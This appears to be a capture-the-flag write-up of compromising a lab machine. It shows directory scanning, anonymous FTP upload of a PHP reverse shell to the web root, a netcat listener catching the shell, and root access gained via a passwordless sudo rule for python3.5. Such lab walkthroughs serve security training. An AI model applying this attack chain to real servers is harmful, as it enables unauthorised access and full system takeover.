Enumeration
port 80 is running default apache server
so using DirSearch ,it finds there are these directories
Target: http://10.0.2.98/
[03:31:49] Starting:
[03:31:49] 301 - 306B - /files -> http://10.0.2.98/files/
[03:33:22] 403 - 274B - /server-status
ftp is allowed to upload files , directly on webserver this can lead us to code execution on server
Exploitation
uploading the php reverse shell
ftp 10.0.2.98
Connected to 10.0.2.98.
220 ProFTPD Server (ProFTPD Default Installation) [10.0.2.98]
Name (10.0.2.98:user): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful
150 Opening BINARY mode data connection for shell.php
226 Transfer complete
3460 bytes sent in 0.00 secs (143.4658 MB/s)
ftp> exit
221 Goodbye.
these lead us to get a revrse shell
nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.0.2.93] from (UNKNOWN) [10.0.2.98] 37530
Linux ubuntu 4.4.0-194-generic #226-Ubuntu SMP Wed Oct 21 10:19:36 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
23:53:49 up 27 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ ls
Privilage Esclation
ww-data@ubuntu:/home$ cat important.txt
run the script to see the data
/.runme.sh
www-data@ubuntu:/home$ cd shrek
www-data@ubuntu:/home/shrek$ ls
user.txt
www-data@ubuntu:/home/shrek$ cat user.txt
cat: user.txt: Permission denied
www-data@ubuntu:/home/shrek$ /.runme.sh
the secret key
is
trolled
restarting computer in 3 seconds...
restarting computer in 2 seconds...
restarting computer in 1 seconds...
⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀
⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀
⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆
⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆
⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆
⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿
⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉
⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇
⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
shrek:cf4c2232354952690368f1b3dfdfb24d
www-data@ubuntu:/home/shrek$ su shrek
Password:
shrek@ubuntu:~$ sudo -l
Matching Defaults entries for shrek on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shrek may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/python3.5
shrek@ubuntu:~$ sudo python3.5 -c 'import pty;pty.spawn("/bin/bash")'
root@ubuntu:~# cd /root
root@ubuntu:/root# ls
root.txt
root@ubuntu:/root# cat root.txt
____
____....----''''```` |.
,'''```` ____....----; '.
| __....----''''```` .-.`'. '.
|.-. ..... | | '. '.
`| | ..:::::::::::::::| | .-;. |
| |`'-;-::::::::::::::::::::| |,,.| |-='
| | | ::::::::::::::::::::| | | |
| | | :::::::::::::::;;;;;| | | |
| | | :::::::::;;;2KY2KY2Y| | | |
| | | :::::;;Y2KY2KY2KY2KY| | | |
| | | :::;Y2Y2KY2KY2KY2KY2| | | |
| | | :;Y2KY2KY2KY2KY2K+++| | | |
| | | |;2KY2KY2KY2++++++++| | | |
| | | | ;++++++++++++++++;| | | |
| | | | ;++++++++++++++;.| | | |
| | | | :++++++++++++: | | | |
| | | | .:++++++++;. | | | |
| | | | .:;+:.. | | | |
| | | | ;; | | | |
| | | | .,:+;:,. | | | |
| | | | .::::;+::::, | | | |
| | | | ::::::;;::::::. | | | |
| | | | :::::::+;:::::::.| | | |
| | | | ::::::::;;::::::::| | | |
| | | |:::::::::+:::::::::| | | |
| | | |:::::::::+:::::::::| | | |
| | | ::::::::;+++;:::::::| | | |
| | | :::::::;+++++;::::::| | | |
| | | ::::::;+++++++;:::::| | | |
| | |.:::::;+++++++++;::::| | | |
| | ,`':::::;+++++++++++;:::| |'"-| |-..
| |' ::::;+++++++++++++;::| | '-' ,|
| | ::::;++++++++++++++;:| | .' |
,;-'_ `-._===++++++++++_.-'| | .' .'
| ````'''----....___-' '-' .' .'
'---....____ ````'''--; ,'
````''''----....____|.'
invite-me: https://www.linkedin.com/in/eliastouguinho/root@ubuntu:/root#
root@ubuntu:/root# id
uid=0(root) gid=0(root) groups=0(root)